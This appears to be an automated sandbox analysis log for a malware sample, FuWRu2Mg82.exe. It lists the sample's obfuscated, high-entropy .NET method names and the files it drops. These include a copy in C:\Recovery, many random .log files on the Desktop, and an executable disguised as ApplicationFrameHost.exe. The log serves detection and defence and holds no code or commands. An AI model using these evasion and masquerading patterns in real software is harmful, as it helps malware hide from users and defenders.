Source: FuWRu2Mg82.exe, LFTyqLHayIVFT86BtVL.cs	High entropy of concatenated method names: 'Yd4HDdu50G', 'Le8la2eKUi1af1DnenAJ', 'wKQXdseK1lD3ypqLASSf', 'FbkXoIeK2vBqUchrL8g7', 'oIw4MaeKdr6M4kDLdu7A', 'wMXUdAeKGw9qpb9X1nHD', 'E94', 'P9X', 'vmethod_0', 'Xlde75N6Mue'
Source: FuWRu2Mg82.exe, lrmDepYWNQKcggQFcow.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'TZgexvWE1eL', 'iOGe7TXF52o', 'TKCjg7eQaOnidEwm61do', 'f54AwseQ8lDcZhATSLKq', 'x1E5CyeQcQvY0nGAmHr2', 'F1r7OEeQhcVNGBQ6p9tX', 'mYrJM2eQEdYPb7VgBvZS'
Source: FuWRu2Mg82.exe, PghlWe7GxiFrSLrkUxW.cs	High entropy of concatenated method names: 'BOr7Orwomi', 'KTSCeYeD73oqNrbT2B8k', 'fHMIa9eDFu830dr8pA9B', 'wmsc1oeDyKajhWPv2YJc', 'PceNTHeD0Rr6XHNKUM0s', 'sl3ETteDtLW6VKB6qZVn', 'iv6N2SeDiyGgkiW9ytol', 'A8axuDeDxCXUrGUgtFmM', 'U8pFHoJThw', 'BKbppQeDvoFu0bFQ87w7'
Source: FuWRu2Mg82.exe, kCffCKcRssNYsTqt08q.cs	High entropy of concatenated method names: 'atKcvOUBu2', 'cLGcb1dnog', 'GtgcscBsyy', 'rFFcVFmYn2', 'MGmckloLfe', 'JSNVgKeTqj1ruidNhPEW', 'kym6uTeTVxZ6FZOLUSHs', 'CDwSEbeTknK6oSch59wR', 'WYuoIMeTnOvchMxUMb4X', 'EikndqeTYS3pl4aq1tWX'
Source: FuWRu2Mg82.exe, zNw0NRueYIsrjMfukCH.cs	High entropy of concatenated method names: 'rC9', 'method_0', 'PTFexYvk5Ne', 'Rnuex5pRFyb', 'aAejSjeXIFLcYSmoLEus', 'yIN6hSeXTJSlHLnBsG9m', 'Nn2aCceXMimPAvDQMLwJ', 'uvCQEseXrDqyVs1J6Srm', 'UofokDeX69tOKmIHh3Dh', 'UdLIhveXP3H854NeoOkd'
Source: FuWRu2Mg82.exe, Dh7ptN912qSqDZBq6qd.cs	High entropy of concatenated method names: 'Close', 'qL6', 'tNv9UjqSMW', 'EHx9dZoYfu', 'lhu9GLUkb1', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: FuWRu2Mg82.exe, KFWwCsWDJx7c7wrnNID.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'cSUW9lJgJq', 'WBGIioeZXq1V0aSlGDno', 'gcKGTgeZAAhq8ET4a3W4', 'LAIxGdeZN6xILFtHcV7j', 'odFHseeZIGiVTeHfLM1w', 'kOSVbBeZTPKSmHmf6hOP', 'cT8PkUeZMivPnryCIbki'
Source: FuWRu2Mg82.exe, oXxBggie0ZmL5PneekJ.cs	High entropy of concatenated method names: 'gjQi0OhVTP', 'guni79VIsk', 'LjbiFxJoVy', 'b3Rjqoe9F8R1hjuSgyUd', 'pryn1Ue9H4qDTKY5Mpqf', 'BKmisye9iHONluP51XbF', 'rmDytCe9xUTiq5vuCoTG', 'qO3P1Qe9tds16pKd8Lgf', 'scGiave9Cs1M3Q2p7YN3', 'QVA1Due9Rjo65hfCVGvQ'
Source: FuWRu2Mg82.exe, qabroYtbB3D50uXy16u.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'MXyBUPe1d8x0uAXmkyfw', 'oPagDhe1GAxdiYXrvhpl', 'EfYx2He1QJG7tgmgsZ0v', 'esMtV880EP'
Source: FuWRu2Mg82.exe, y3mBNd0P5rN1XiEILmW.cs	High entropy of concatenated method names: 'YHE70ejlH8', 'Bjh771Dl5s', 'yCl7FaScZ0', 'dORxpIe3eNQ4rjMWTJmN', 'DcqTj9e3yULbsokJMw6E', 'adfq6IemzZAiqx8DwQWH', 'BNZgC8e3g6LvHd6gGsal', 'YOb7RY7YEZ', 'wTDuyJe3H9Nd5nIq8wyX', 'DGaR3ve375OjOmI4iuue'
Source: FuWRu2Mg82.exe, ErRPbOFoVwJJaqsX3H1.cs	High entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'Y3ye7RfZcnI', 'aU9F2Sk5cI', 'imethod_0', 'UP2GSbeDQNuA2P4Cwsbt', 'Awu7yOeDX6LFdJV49Qp5', 'Ok5tJBeDAbyceNZQucMf', 'qFogwpeDNj6nrVl5WtBl'
Source: FuWRu2Mg82.exe, mHX6XkiYPPNnYyq6THR.cs	High entropy of concatenated method names: 'fAgiEvejK0', 'bKtZIwe9NQHdOPn2muud', 'DS4hvIe9I7OCC9xlpVu1', 'G2K7EWe9XhOpRnx5UPr2', 'FuT4LNe9AVafdc6ChS9U', 'YCJj4Ge9T34G1aMdM5FD', 'Ev1i9Me9Mhia8PAuQogX', 'a1ViueJqN4', 'Kjxip0Hthv', 'Mm8ifcVXXA'
Source: FuWRu2Mg82.exe, hY5UEhtyuyfRnZMGb5y.cs	High entropy of concatenated method names: 'mwwt7BkYrv', 'Y47tFN6mub', 'xfptH7OrDE', 'gahtiVE7gG', 'ek3tx6baFX', 'faXtt6JGbY', 'JnQtCCsCkU', 'zUTtRbkGT0', 'mJDtwjnuKA', 'lmhtvk0yQV'
Source: FuWRu2Mg82.exe, jyOsgnDxclqoo77egR7.cs	High entropy of concatenated method names: 'HWRDCRMvuQ', 'nCNDROAVcA', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'YfqDwojEdg', 'method_2', 'uc7'
Source: FuWRu2Mg82.exe, RknpXvxhmno1QRn6Tkc.cs	High entropy of concatenated method names: 'F90xm0pK1t', 'uaXx3IL24U', 'kJVxD23p2I', 'FHkxK0bTce', 'c0Tx9T3SgM', 'U5AxosrEmX', 'rfBelSeoZm6QWi9te2M5', 'HWoLuVeo4nC9fdrhklMT', 'gHVBmNeol1rFMfSyFXs6', 'DOmfdYeoOxDRBY3tLl82'
Source: FuWRu2Mg82.exe, RCAec1OnxHaCDJq0Neu.cs	High entropy of concatenated method names: 'g2oOmxqlnu', 'Q6gO3BoZO8', 'VMPODPQJQG', 'S8qOKiO1ve', 'lDFO9TLV4H', 'nBaOoeVNaF', 'v7rO198t2j', 'ewjO2hGG0R', 'uBQOUy8Q2F', 'k9XOdOLEOa'
Source: FuWRu2Mg82.exe, eBc6IHzwLtrmQGCCpb.cs	High entropy of concatenated method names: 'gALeeDhXJC', 'QYoe0B9U6Z', 'HWAe7vehOF', 'we4eF1Y8kP', 'v5QeHuTFps', 'ToreikRbAK', 'tnyetbKnIH', 'UVFrqXehR9FxdghlfBJE', 'UFhEs8ehw8ldpfBKNNsE', 'koMdWiehvUeJVKaXgm7X'
Source: FuWRu2Mg82.exe, ePXnXXGDAs1fh2KhAcC.cs	High entropy of concatenated method names: 'ITjG9rvqol', 'Ba1Go9mE7R', 'RFXG1McIJZ', 'aK8G2TJcyZ', 'kMYGUjnLoH', 'AX7GdUOMjg', 'pQGGGxkcNs', 'NKdGQQW427', 'XKCGX4igUX', 'johGANl9ed'
Source: FuWRu2Mg82.exe, r2Q0mauVCYSkdWNVY1j.cs	High entropy of concatenated method names: 'koFjJOeAfjkq2qpjvr3a', 'Aqqa3MeABspZJlSwWsGx', 'xktVvgeAuX45qtJYDW7W', 'kaeZSeeApmFFvga0A6Vs', 'method_0', 'method_1', 'nS1uqIxnQN', 'irnunGntwM', 'Ur9uYO7i1S', 'qyru5PEYPF'
Source: FuWRu2Mg82.exe, WfoWMi3IrwaS1rerZMT.cs	High entropy of concatenated method names: 'y833MsDU7x', 'yud3r2Vb22', 'qvK36omxZy', 'fID3PHJZ6U', 'XXT3LvZRQJ', 'dT7rpue6TZPlTh5qxcRY', 'gPAhsRe6Mx4vmLse6AQQ', 'Wlkx9ie6NJ98eV4ssVZ7', 'vm9C0Ve6Isjn1KIKAn8T', 'QtAAGne6rf2KQO5dKQZe'
Source: FuWRu2Mg82.exe, SiX4ewxkpm93i7onrL4.cs	High entropy of concatenated method names: 'iYux5kYPg2', 'nawGKweodU3OhDGS5Agu', 'Si0qb4eo2a43bul3u1mR', 'ejyGuVeoUbb9MbqkIsYY', 'BbPrtWeoGFII98g3BNOR', 'h4BxnlHsTr', 'ilAlEPeoDpeHUI5nW0tU', 'hD0nQleoKAtNaGHV4sZ0', 'hYk7EAeo9ZKSd8ffHo53', 'KL1UELeomoweeCb3AhKl'
Source: FuWRu2Mg82.exe, FhyjFFWUSbNVHnlZMqE.cs	High entropy of concatenated method names: 'k1Xexcy91qv', 'SDMeH8yRouF', 'qQqu9Ee4RjoO57qcqbq3', 'zdWbJxe4wqrhusEANcnY', 'hgm2U1e4vYyVPPfm0Y3f', 'eMKh1Ne4kcb0KtG5npJb', 'IOh6FXe4siqAc0oMJghO', 'CGDBC7e4VgGJHc2reWOX', 'eqm6oEe4qos1ua2KNXaL', 'imethod_0'
Source: FuWRu2Mg82.exe, toX4n0iDLHr2w59ypWl.cs	High entropy of concatenated method names: 'wQli9Dmuie', 'QIRiop111M', 'nZ7jWVe9631h2B3fanT3', 'xr0dsYe9PF5Rl6ymAjoR', 'O8PhxXe9LXdwIUmNjIeM', 'k2WZ4Oe9SWrJcVdLYBwh', 'XoRA6Ce9WEjnxiNcp37Z', 'uC3jYAe9jJVkGixprX6H', 'CapYLDe9ZmTJaCyxdcpM'
Source: FuWRu2Mg82.exe, Hu0S9YEJFCIXmBxgMco.cs	High entropy of concatenated method names: 'qUGmgxunCf', 'cFemefdbvj', 'PIlmyVClfX', 'jk9m0Px0Bb', 'hy8m7VuO0Z', 'b0xmFit4w5', 'v9EKuneMO11csjdFjJEb', 'Xq9bKqeM478I8IliSpqh', 'VhRfRDeMlBBp2HVcYdo8', 'lj4UAkeMJbO3y1pFOU6b'
Source: FuWRu2Mg82.exe, wHWMO7ZvXFcQZEoL1GY.cs	High entropy of concatenated method names: 'pysZVQcvqn', 'IARZYDZKB4', 'JLZZpEgfZm', 'DGOZftMgeD', 'iGPZBlmd91', 'amqZaLBxLk', 'WCeZ8eFrqb', 'VSTZc5vuCC', 'Dispose', 'zqedCEelbqBwNRwtXuQT'
Source: FuWRu2Mg82.exe, xfPrtnh07FGijtO2YFO.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'np8hFZ0n2p', 'Write', 'kTShHZbe6U', 'ayVhik3ZSY', 'Flush', 'vl7'
Source: FuWRu2Mg82.exe, DeJrRTtBhRWmQxXX5fB.cs	High entropy of concatenated method names: 'iB8dsNeUNm8UU5XgK8Vv', 'Fia7e0eUXr7W0p6qOxCY', 'FYRWmJeUA4BA3cLqcC5E', 'WGsbtReUILmjtRGx9mHk', 'jabbJsCalx', 'mFohEbeUMXd0vgGJleAh', 'h09IdQeUrGst344fYVdp', 's6P2cveU6IYGKlW8sR2P', 'g6tseHwFpI', 'EDnC1YeULBec17PxWLfE'
Source: FuWRu2Mg82.exe, vbJUUPEStWZDit21SsS.cs	High entropy of concatenated method names: 'BfQEjtIQFl', 'agHEZt9vt0', 'hB8E4cdTxB', 'cSbElflLsM', 'otPEOQ3ddw', 'cc5v4heMr6JdAdjGgxGI', 'eb5K6PeM6R30fQnkgQMM', 'xJv1sUeMPgBS2VjQAgo3', 'TNVBCteMLMKOYKLxTdyr', 'bpmlXHeMSd8xyQ9HycgJ'
Source: FuWRu2Mg82.exe, FP0PZDsfELF5Z99k4h1.cs	High entropy of concatenated method names: 'OecYvBjRoo', 'O8tYbhWySj', 'k9MH1yeGMoT5CZQ2P4yo', 'DVfOQleGIRffVVuGWFhd', 'bVV4OLeGTl8dYpNEnQ8V', 'DPSdQJeGr3oLDBVu34dw', 'DiyQQKeG640xZlMWfc3Z', 'CytYYJLSvL', 'sA7gw0eGWEgP1Z1xbEcA', 'RtvH8DeGLwaYWMqEO46R'
Source: FuWRu2Mg82.exe, wKHEqf5bBLFPRUK37s5.cs	High entropy of concatenated method names: 'wL655MbiLK', 'RJVUaAeQOUln2o2vrOjW', 'D7rwgNeQ4Fu2Me0GGGtK', 'NPDMPveQlVJumNxlxEHE', 'Iyh03TeQJwYr718a1afW', 'tdS5VwfwAF', 'sysRNKeQLjJtsNvdw1Vv', 'dYyVKieQ67SLIgMp3qRk', 'Cu8mJWeQPrIXIMthN6T0', 'ja6TfEeQSpmYZnZV2Dnd'
Source: FuWRu2Mg82.exe, nmHwIZ78n1xVqVJfsHm.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'xiTex0TacfE', 'bjLe7ewdgZl', 'A0SFODe3a2oSDKnVO49s', 'I6x9gie38kOyKW54mwZc', 'Nv4WNUe3cReDT9MWvPQp'
Source: FuWRu2Mg82.exe, neKr3AFts0fmEJA7xIW.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'H4DexFmlykW', 'bjLe7ewdgZl', 'rDdHvTeDVftVOYTRrlUI', 'rcEhZoeDko7DSEt7FET5', 'oBq46peDqPj7UgAs5rea', 'ENhESieDnorwr7ogJtO7'
Source: FuWRu2Mg82.exe, sirikeG4r1At401YL9i.cs	High entropy of concatenated method names: 'g3UGOtI9a6', 'mUlGJqwqtt', 'GQ7GzFAc6v', 'cc2QgfBHPb', 'SV9QeZi9bQ', 'bC2QyV4Y3t', 'aFXQ0GQqUG', 'JS0Q7gZZU7', 'f42QFttsrs', 'jXWQHlu2eY'
Source: FuWRu2Mg82.exe, wjCFDmoPWmCMiEoaFhe.cs	High entropy of concatenated method names: 'BQ5jnZeSFy4Yyfd5q6UW', 'tX2YOUeS0LjEcwjCTVS0', 'xQRN6keS72gwgavpiged', 'gaiUQmeSHSmkf4YTnVHI', 'LjCoSJimNQ', 'Mh9', 'method_0', 'UGToWWQko6', 'R64ojc3G9m', 'AptoZ1fwLS'
Source: FuWRu2Mg82.exe, yi2k3C8BLgaRpI6P13D.cs	High entropy of concatenated method names: 'xVl88Vb0ag', 'nLO8cWsTyn', 'gO08hH3y8N', 'KrC8EfvWwx', 'icL8mH4L91', 'otWgdOeI46klhuoDV5ik', 'tLKoRYeIlt3L93A7oTLs', 'aZyxsdeIOMliOnCtAFaX', 'URfppLeIJWVq1VnXQKKc', 'HQL1RJeIzO9wSr0LREpP'
Source: FuWRu2Mg82.exe, S2bIjUiXxHlDj62OVAl.cs	High entropy of concatenated method names: 'By9iZTroC9', 'LKPi4eZbSG', 'B6PBhaeotLaIaAy1wRWJ', 'o97SwTeoigVW28VEwOQB', 'Nu5X76eoxnrJqVRWjABc', 'M37vmWeoCUEWNG2nSRp3', 'YQciNEGnE9', 'MLeiIKQpDR', 'BNyiT54nAS', 'G0EiMS4Xys'
Source: FuWRu2Mg82.exe, Ru1os0Q1TsAdyjWqOl3.cs	High entropy of concatenated method names: 'pUWDQIejW76JdJo7Qe67', 'i9k2XfejjDJ6kQGLqnFG', 'gFIlv1ejLtTHBv0bydoa', 'fXLWRXejS23n1MjM1esB', 'PndbCfejMhEB4k1A81KQ', 'rrORQTejr3n6MSE3kT8y', 'ufshjhej6F2HaJPZAv9I', 'wQCXgnejICvtPDPto6sd', 'JRsX88ejTVw7jd3p1Rsu'
Source: FuWRu2Mg82.exe, gjY8nlKuUpIBJwGWy1s.cs	High entropy of concatenated method names: 'q199bSutWq', 'dbvdVdeP6WwuqQV98sPA', 'COpmIHePPG8aW9adKUm8', 'U8ogNSePLE7XP5GD41U2', 'kt5', 'VPmKf1CghV', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
Source: FuWRu2Mg82.exe, pb2BtgeJd19h3gpEb0w.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'HWDexeRNS0T', 'bjLe7ewdgZl', 'atEgQIeEeBOPfF4MCRna', 'GhvRAeeEy2rh8iAsMSSK', 'gZvxU7eE0e0EUt3j6eYG', 'hS43tGeE7e7F0vX789Cb'
Source: FuWRu2Mg82.exe, MoUsVIdD7VSt4L7rDnx.cs	High entropy of concatenated method names: 'PLdd939cjS', 'IhAdoP6A55', 'UbQd1dkGIH', 'fa1d2USDSh', 'WOLdUoHRAR', 'biwddukMK8', 'W5KdGwvEAU', 'bQUdQwrUPy', 'vYCdXrcvwi', 'yhsdAWswS4'

Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\iSLkMDwk.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\TYnMSebw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\BpwztmWB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\RAMHNFsb.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Recovery\axnJvpyQnMRKSw.exe	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\hUZevebs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\cuiLHKPV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\pdJUqKUa.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\qrwDMrig.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\oOhryAfv.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\cYXMozly.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\nvvlJpme.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\nuOBvxNF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\fXRNARLX.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ZfooXlGj.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\dgbVxyFV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\HQUAuzHx.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\DOypUrKc.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\waDRLkih.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\wQKprcQn.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ZuAdpowF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\grWVOsjw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\SwGfVNiy.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\CQWhyrvh.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\JEszLdwN.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ohaCMYDg.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\aTWLrgjG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\SoXNqeHs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\pkzkNEOy.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\luItGIOF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\WQnMOzSe.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\HplZKgpp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\zgBjPAwH.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\GBhRZStr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\qjNliHHb.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\JGbOwXPR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ehScSkLt.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\zzTAZvvH.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\bmeDyKvy.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\MwRFEUPK.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\hLfttZpU.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\fiPsZiXa.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\kFEuCsml.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\UcbVcsDq.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ifVUOvZl.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\uIPRftWP.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\oMWtDbZy.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\XoywUTAh.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\IlfySofL.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\HxbpgajN.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\CdAHeASz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\zAAjmmUg.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\dcBDaqCa.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\IUYfDSlJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ejtNoRQz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\WaJXtmYR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ChaYBIVv.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\UyzMiIGL.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\dfuljGgw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\UyIFNWAo.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\BBFiueAC.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\FzdFbFVV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\adnNjHjk.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\PhxVLhaD.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\VClwANRP.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\UsWpvprv.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\YksUcbqD.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\YNJWsoOG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\lejLFetb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\miMCrVKD.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\LTSgQlLh.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\pVxSCwGb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\uqqCdnCx.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\orpJRxcA.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\BNVQohxV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\wSNBpqnJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\gVWkEyHr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\GPaymKbQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ENiSZQDC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\iGwCTAyR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\RYEpuIuX.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\EihSxCbb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\HQSFHwhn.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\fJtKXqkZ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\fzytxiEW.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\FVlaiPXZ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\uFzSfHem.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\MQtollac.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\quplWHMD.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Windows\Web\ApplicationFrameHost.exe	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\sbpbUBOr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\zrjhuLVB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ySSJffnK.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\tGqbwPqT.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\UGLNXWUK.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\HiZYWSbq.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\zXHyMvKj.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\IjUzWPZN.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\MLpHgvqI.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ZqkeqCFc.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\RzlVrZnV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\nONBTjme.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\bYEWJish.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\swbUrqRy.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\KozQBPIf.log	Jump to dropped file
